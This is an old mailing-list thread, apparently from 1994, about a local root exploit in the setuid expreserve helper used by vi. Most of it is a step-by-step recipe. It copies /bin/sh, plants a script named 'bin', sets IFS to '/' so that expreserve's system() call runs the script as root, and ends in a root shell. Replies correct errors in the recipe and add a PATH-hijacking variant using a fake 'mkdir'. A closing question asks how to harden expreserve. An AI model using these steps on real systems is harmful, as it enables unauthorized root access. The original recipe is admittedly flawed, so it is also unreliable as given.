Charles Howes writes: > On Sun, 16 Oct 1994, Chris Ellwood wrote: > > Charles Howes said... > > > ObBug: vi runs expreserve when it crashes or you type ':pre' (on some > > > versions). Expreserve is setuid root. Expreserve runs /bin/mail > > > with 'system()'. So, do the following: > > > % cd /tmp > > > % cp /bin/sh fubar > > > % cat > bin > > > chmod 4755 fubar > > > ^D > > > % chmod u+x fubar > > > > I see a couple problems with the script so far. /bin/sh was copied > > to fubar while you are a regular user, so it will be owned by you > > and you'll end up with a nice copy of /bin/sh that's setuid to you, > > not your target user. Also, that last line should probably read > > 'chmod u+x bin', not fubar. > > Ooops, forgot the chown. Sigh. Trust memory to lose things. > > > > % setenv IFS=/ > > > % vi > > > :pre > > > :q > > > % fubar > > > # > > > Some versions of expreserve don't have the hole. > > > Some versions of vi don't have the :pre command. > > > One does not imply the other. Better still are the versions of expreserve that do a system("mkdir ...."); Create a file called "mkdir" and put "." in your path. Just out of interest, what is needed to make it safe? Is making it non-setuid/setgid and /usr/preserve mode 1777 sufficient? Is there any way of subverting the "expreserve -" from the boot scripts? -Peter